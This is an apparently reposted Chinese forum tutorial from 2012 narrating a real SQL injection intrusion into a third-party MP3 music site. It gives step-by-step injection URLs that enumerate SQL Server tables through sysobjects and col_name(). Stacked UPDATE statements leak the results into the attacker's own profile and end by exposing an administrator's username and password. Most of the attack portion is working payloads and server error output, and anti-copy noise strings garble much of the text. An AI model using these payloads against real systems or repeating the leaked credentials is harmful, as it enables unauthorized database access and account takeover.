标题: SQL Injection For SQL-Server渗透实例技巧 [打印本页] 作者: admin 时间: 2012-11-13 13:32 标题: SQL Injection For SQL-Server渗透实例技巧 SQL Injection这个话题越来越热了,很多的论坛和hack站点都或多或少地在谈论这个问题,当然也有很多革命前辈写了N多的关于这方面的文章,所利用的也是许多知名的程序,比如动网,尘缘雅境,而我们也可以拿到免费的程序来看其中的漏洞和数据库的结构,从中来达到注入的目的,不过如果是别人自己写的程序,那么我们就不知道他的源代码,更不知道他的数据库结构(数据表名和其中的字段名),就算有个变量未过滤提交到数据库去,我们也是无从对其下手的,只能利用通过猜解他的数据库结构来构造相应的SQL语句。 ; p" {/ K+ H4 I- a$ V 8 j* S3 a0 n2 n0 V# J: \* u, V那么是不是就到此为止,能猜到多少是多少呢?没有做不到的,只有想不到的,我相信这篇文章对研究SQL Injection朋友来说,应该会有所启发。 * |" z2 s1 {* D" \$ K* K7 m4 ~2 j4 [% U! O4 u. i
一、发现漏洞,常规注入 ( {9 i4 d/ U% {+ f% @% _ d0 \* B$ e0 s) Q* J! u
最近帮我们的站增加音乐,虽然本地的电信的音乐资源库非常丰富,但是缺少有关歌手和专辑的资料,所以到网上去闲逛找点有用的图片和歌手简介,通过百度搜索到了一个mp3的音乐超市,里面的资料还是比较丰富的,拷贝的同时顺手在他的Specialid=1817后面加了一个(单引号),我突然眼前一亮:8 K$ ]* j' n) H. N
1 a! X; \+ [( s/ C2 G/ [
4 M% V( S* n7 S& Z) z ^4 h; C . B; g3 @: U$ z+ l% z0 Z" @# vMicrosoft OLE DB Provider for SQL Server 错误 80040e14 $ t3 @. z/ E% b* x E3 P字符串 之前有未闭合的引号。 ) \" W- p/ s; c8 c$ P% T: `' ^/showspecial.asp,行13 ) g9 ^5 f# E: m% p
* O0 y- @0 T4 d0 w& {9 L
Specialid没有过滤掉单引号就直接用到SQL语句中去了,而且是SQL SERVER版本的,漏洞的可利用性极大,可不能就此放过这么好的练兵机会,接着换;(分号)提交进去,居然页面正常出来了,说明该变量也没有过滤掉;号,到这里,我们就可以对此进行SQL渗透了,按照常规的步骤:' \0 k# U% @- p# _, b3 F% c3 i
: q- o! b' V1 @ M) Z( |$ o! h3 S
1、提交http:/showspecial.asp?Specialid=1817;use master;– 8 J# B; g Z! b$ v" g, P 2 P) a3 l7 _9 q8 k( a9 _ 注:–的作用是注释掉程序中后面的SQL语句,以防对我们构造的语句有影响,比如order by.., Y% y$ d& c) N+ p0 H
2 y0 u g' u: @% G, R1 k6 g- J 出现8 Y1 S: t) K, R, O" ~* f
2 l: U$ `- g& ~6 e4 D# I
& R- y: A5 ~! }3 W . Q; p. ?( J/ e% ~$ x3 @Microsoft OLE DB Provider for SQL Server 错误 80040e21; U" r, Z0 C: ~, ^; O6 {6 h9 Y! W: r
多步 OLE DB 操作产生错误。如果可能,请检查每个 OLE DB 状态值。没有工作被完成。 6 n- I- P7 N5 B1 y; H/showspecial.asp,行13 . f( c0 j8 a' S( F: J: L
2 T% G* O+ x* l% o$ ]
想在他的数据库里增加一个管理员是不可能了,我们再换一种方法 / t7 R$ g- h1 D) o2 v1 @8 Y* J. A; A2 h( Q' i: l5 o8 ^
2、提交http:/showspecial.asp?Specialid=1817 and 1<>(select count(id) from [user]) 6 [) k1 j% E+ ?* \9 N- m( P3 {* o( Y
这一句的意思是猜猜看是不是存在一个名为user的表和他里面有没有id这个字段$ C' }6 r) `) _; t1 V) ^' X
* V! ~" {. }3 `/ k& D 一般来说: ; y! J U& \4 {8 z9 o% p) p. i* I9 _# i6 N0 [" {
如果不存在该表的话,会出现) A& y5 r/ D2 d6 y2 i
2 f1 n. X& i0 ]8 x' W
6 R0 I7 |8 V$ ?) I- S+ m' k : \4 G+ \" g1 H9 r# B9 DMicrosoft OLE DB Provider for SQL Server 错误 80040e37& h4 B" e% W$ t! f
对象名 user 无效。 ( \( \% C! z' E* O! M/showspecial.asp,行13 4 a$ V' z: I% H" O1 \ 不存在该字段的话,会出现 $ ^+ g8 k2 i o' KMicrosoft OLE DB Provider for SQL Server 错误 80040e143 [! ~: X2 \3 `& A# {
列名 id 无效。4 o# S2 q F- ]
/showspecial.asp,行13 8 F1 q- R+ P5 y5 D1 I6 d7 @" B/ \. Y' y. M: s+ ]3 v3 c5 q
注:一般来说,第一步是猜一些公共的表,这里所指的公共表的意思是大多数的程序员在写设计数据库结构的时候会用到的常用的表和字段,比如新闻的news表中的编号字段id,标题字段title,用户表user或者user_data中的编号字段id,用户名字段username,当然你也可以在该站点的登陆界面看他的原代码,找到用户名和密码的表单的name值,那个也经常会是表字段名的真实值,如 * k; h8 o1 A, w+ s4 ?, O# W/ @& j ]" q
很幸运,果然存在user表和id字段 $ w# }& E* H7 V9 P6 ?/ M& O. ^( Q3 G4 k* h/ D$ @
3、通过提交http:/showspecial.asp?Specialid=1817 and 1<>(select count(username) from [user])3 A: r) Y, H8 M7 b) g
f1 B" g/ c0 q! S 这里的username是根据登陆框的表单名去猜的,恰好存在该字段。于是在该站注册了一个用户名为rrrrr的用户,作为注入的平台,得到我的用户名的id值1035348 [$ b6 U6 Y- }; X* k# {9 i, r
, A4 F4 |: w# p8 r) C
4、继续猜下去,这里我还是利用的他程序中的表单名,提交: 4 K8 f5 J; b7 ~8 z& S6 v& X3 m7 Q! e* w A3 h
http:/showspecial.asp?Specialid=1817 and 1<>(select count(email) from [user]) 7 ]4 Z- ?7 j" B5 C1 e6 C& ]! F4 ?0 M$ z- {0 K
也存在,好了,到这里,我们的平台已经搭建好了。8 d7 N E2 I+ m
# q2 w! T+ |+ J, l
二、深入研究,让SQL自己招数据库结构+ E" _" ~$ M. `5 S, N
- q, W* ~/ G; G- V" W 很多时候,我们只能猜到大家比较熟用的表名,如果是非原程序公开下载的,我们很猜到他的真实数据库结构,有时候猜半天都猜不到,令人很郁闷,那么该如何拿到他的表结构呢?我们知道SQL SERVER的每一个数据库都会有用户表和系统表,根据SQL SERVER的联机帮助描述是系统表sysobjects:在数据库内创建的每个对象(约束、默认值、日志、规则、存储过程等)在表中占一行,那么也就是说当前数据库的表名都会在该表内有存在,(对象名 admin 无效。大家可以看到上面出现的报错把表名描述成对象)。- s4 ]: e0 r( ^1 r9 O
' |$ |- _2 H8 v! u 我们要用的是其中的3个,描述如下(详细的见SQL SERVER的联机帮助):8 y8 E: k$ P# d1 D
0 [" T0 A5 `6 Q% _ 3 _9 C D& Y0 Q) ?, X1 m) _2 M
8 z! n# }4 l& `/ e) c name 数据表的名字 : @# S6 J/ @" P xtype 数据表的类型 u为用户表: q% J" r& A M9 z; `
id 数据表的对象标志 2 \7 X, q4 \7 N! u6 n status 保留字段,用户表一般都是大于0的 + h2 Z* \- `0 h0 h& O2 I- X' P/ B 7 m; O( W0 h) s$ w 在查询分析器执行以下SQL语句(以我本地的数据库为例子)0 q; r* d V. C& J: n7 G
% V5 F3 L4 ]7 p: `- m1 m7 N/ j
2 {5 W# v4 ^! m5 Q0 c4 Q) Q 7 E$ A' w* H- U7 A) @& Kselect top 1 name from sysobjects where xtype=u and status>0 6 {3 V- d! }" _: n" f, _ `5 _' F' n8 a : f9 p9 ]' P; s+ l 我们马上就可以得到该数据库下用户表的第一个表名gallery - ~! Y4 `2 R, W5 ]- z. j' ~$ w% `
, J. | D, A- z
# `5 @0 ^. H" S) O
select top 1 id from sysobjects where xtype=u and name=gallery . i2 R& x2 ]4 M( V5 V5 ^ * t/ a* S1 ]5 P; g' Q: ^ 我们马上就可以得到该数据库下用户表的第一个表名gallery的对象标志2099048 3 g" d, `' w2 _9 j9 o/ O) D$ P$ e9 r3 ^0 c5 [8 G5 t
t/ R8 |7 z7 F" U Z/ \ 2 T6 E$ G7 W i* T$ \4 z& zselect top 1 name from sysobjects where xtype=u and id>2099048 8 X) C, @- r" \0 P$ L! j " t2 _: D* ~& f9 E% T 再得到第2个表名gb_data,这里用到的是id>2099048,因为对象标志id是根据由小到大排列的。 + i, s% Z* j+ _' f: z1 Z p; @8 O8 \7 K' a5 Q% {% k 以此类推,我们可以得到所有的用户表的名字了+ W+ I, {. z3 v1 u2 N* t; U
$ A8 y& h( W2 e( x) m' K- r: ~* \
接下来,我们要根据得到的表名取他的字段名,这里我们用到的是系统自带的2个函数col_name()和object_id(),在查询分析器执行以下SQL语句(以我本地的数据库为例子): ; y. _, R2 L# I+ [8 c5 o. ^$ q. U ) Z) S* A" a j' Q# w8 d# `! ^ : D7 U1 V( W& V0 d9 G/ y& E* j ) q5 R/ T r* c) Wselect top 1 col_name(object_id(gallery),1) from gallery 9 S- N3 v/ {5 v. }: ^: ~$ { " |) W0 h6 b0 q0 U" U6 b+ C, o5 ]% v 得到gallery表的第一个字段名为id。6 m3 m" @/ r8 ~& v
2 H' [9 W) [ u! f* I 注: ' o+ g% A: n0 [6 D5 N) L, B/ p. W3 V4 z9 t4 a
8 d }; p7 N# N
, u2 N' _( ^% D& `8 W
col_name()的语法7 K* ?' U4 D% l
COL_NAME ( table_id , column_id ) ; Z0 g3 W" G" L3 d' e. N1 g: @1 p* u' X+ L5 j2 R. w
参数: Q L0 w+ x& s- Z( V
" \( a) {3 J2 J i 9 K! g' M" F4 ?- O$ B0 S
: n6 Y2 C3 i* m% m: W. g, B table_id:包含数据库列的表的标识号。table_id 属于 int 类型。7 Q' U$ N$ O7 s) q" j) a
column_id:列的标识号。column_id 参数属于 int 类型。 ) \( {! n. |5 I# {: ~& Z) N 6 [6 d2 x! i1 I* Y J* \- y6 j 其中我们用object_id()函数来得到该表的标识号,1、2、3。。表示该表的第1个、第2个、第3个。。字段的标识号; J3 i1 E; A# X; Q; i& w7 d3 s
/ C' G3 m1 z* v6 ]0 p
以此类推得到该表所有的字段名称; W# [- t. j' v; k! ? w
5 r2 s$ T1 E8 j2 g! c/ U( R
三、再次渗透攻击 + M* s% S9 C* K1 d% ]7 _. g- Q$ B @1 g4 Q5 x: ~! w9 r, {7 z
经过上面2步的热身,接下来我们该利用建立好的平台实际操作演练一下了 # s% S* E/ a9 I3 X/ \; ~* T: c, S) n" P# b; h' [$ v: @
依然是那个页,我们提交 , Y3 K$ r5 Y1 S/ N' a& O9 I1 Q7 O/ \
$ t' W6 U* s& H) K- j
- y5 E4 g! Y" J6 x
http:/showspecial.asp?Specialid=1817;update[user] set email=(select top 1 name from sysobjects where xtype=u and status>0) where id=103534;-- 0 D( i' R, j5 t! v4 [$ [3 i9 H2 z, b" m8 @6 R7 D9 Y
服务器返回 1 n! m3 {% S$ k 9 e" ]+ Q- z6 L# z( k! O8 p/ @* v $ K5 Q; f0 V% V
/ J" G3 Z# W! N1 B, N [9 e0 A3 _ADODB.Recordset 错误 800a0cb3 % ?$ j+ R! e3 O, i7 n# m! U7 z当前记录集不支持更新。这可能是提供程序的限制,也可能是选定锁定类型的限制。0 P* a0 k F; M8 i) }
/showspecial.asp,行19 ( f; \$ N; s+ O3 g4 ~$ ]
P+ [! u$ r2 M; ^
出师不利,可能该页记录集打开方式是只读,我们再换一个页" o# l! D) A, q: ^
: _) t$ a& L+ B ~. M. J& R
找到http:/ShowSinger.asp?Classid=34&SClassid=35的SClassid同样存在问题,于是提交 - V: G' k- l) ^& v. y4 {# p" u& E$ u
http:/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1 name from sysobjects where xtype=u and status>0) where id=103534;-- 7 m) U3 t: W, X' C, g( }! b
' i7 t. r" N0 p 把第一个数据表的名字更新到我的资料的email项里去,得到第一个表名为:lmuser) u+ H7 ?( R! a3 s j4 o& d+ y% ?: c
. S+ L& f; \& E( J
http:/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1 id from sysobjects where xtype=u and name=lmuser) where id=103534;-- 1 ]7 P# Q7 H2 n& [& |! w2 V " f+ \/ w' a# [+ S; ~8 E3 H 得到第一个表lmuser的id标识号为:363148339 - l( `, e" ?5 R( T( N* G, I$ S ' N" f9 ?+ k" ~* d! ?. \ ! o+ V1 J9 \% {( @7 |" [" I5 f: n% }$ `9 r
http:/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1 name from sysobjects where xtype=u and id>363148339) where id=103534;-- / Z% n( D8 m: o3 K
6 j( ^4 F3 v# S! `3 t 得到第二个表名为:ad。这里我们利用的是数据表的对象标志id是升序排列的特点,以此类推继续取……(由于篇幅问题,中间省略n步),最后我们得到了所有的表名,发现其中有个表admin,哈,很可能就是管理员的列表了。 3 A- B' M( t, `# _7 ~8 ~/ v* t- e
好,接下来我们就取该表的字段名8 n7 x# M0 E2 k, B( |! C6 x
1 c% Z+ }$ c" }' D+ i : M( ?% N' u l . ]& E& W8 h* D8 n/ |http:/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1 col_name(object_id(admin),1) from admin) where id=103534;-- : g- A9 c. l. x: H3 l/ e ; ~$ H0 L8 c0 A$ N! K p 得到第1个字段为:id; @; B& r0 Y2 i/ S2 I! x
6 {6 x% Y- g# z# r * L- Z7 \" @+ \+ i v
$ t* _" y5 x! X8 m+ _
http:/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1 col_name(object_id(admin),2) from admin) where id=103534;-- ) D0 t: ^- L3 ]: k9 \
& y: r; x6 Y* u
得到第2个字段为:username3 R- `4 v, E' V- _; f6 g
2 ?; A7 X' f; Q$ G' y% f% ^ * _8 e/ T0 ]/ u1 D ) [% s- {" R! ?# khttp:/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1 col_name(object_id(admin),3) from admin) where id=103534;-- 2 }# K( \, E$ u) @& \9 w q
$ M* g3 f1 a/ \+ x' H' ]% N' r; z
得到第2个字段为:password 1 N" A) }" o* T( @$ d W( a* U0 k
到此,管理员列表的3个关键字段已经给我们拿到,接下来要拿用户名和密码就比较省力了,首先拿管理员的id值,这个比较简单,我就不再详细说了。% X( D9 n. s9 j8 D. F. U9 e- R, ^
$ a3 G: u8 j1 n7 D+ Q* b 我们拿到的id值是44 8 u5 A" x( P. W/ F6 E1 F. D+ J6 j3 e4 S% [
4 z) E! s0 |9 @! W- X( C * V$ G, Y7 ^2 E& l% jhttp:/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1 username from admin where id=44) where id=103534;-- : P' S4 U6 E* ?( J8 T7 q6 X + q0 _, | L- | 将该管理员的用户名更新到email项 ,拿到的username为:gscdjmp3 ! n3 z3 ~% |: K% P+ B8 a R# M( V6 I% @% d; x
( x& [& {6 |/ v! D0 B A 7 y( M- j" ]4 @# B bhttp:/ShowSinger.asp?Classid=34&SClassid=35;update [user] set email=(select top 1 password from admin where id=44) where id=103534;-- ; B- h& v3 j3 Y8 A
M' H. e8 p% z1 ] L将该管理员的密码更新到email项,拿到的password为:XZDC9212CDJ7 d) b) G7 D4 _ T9 Q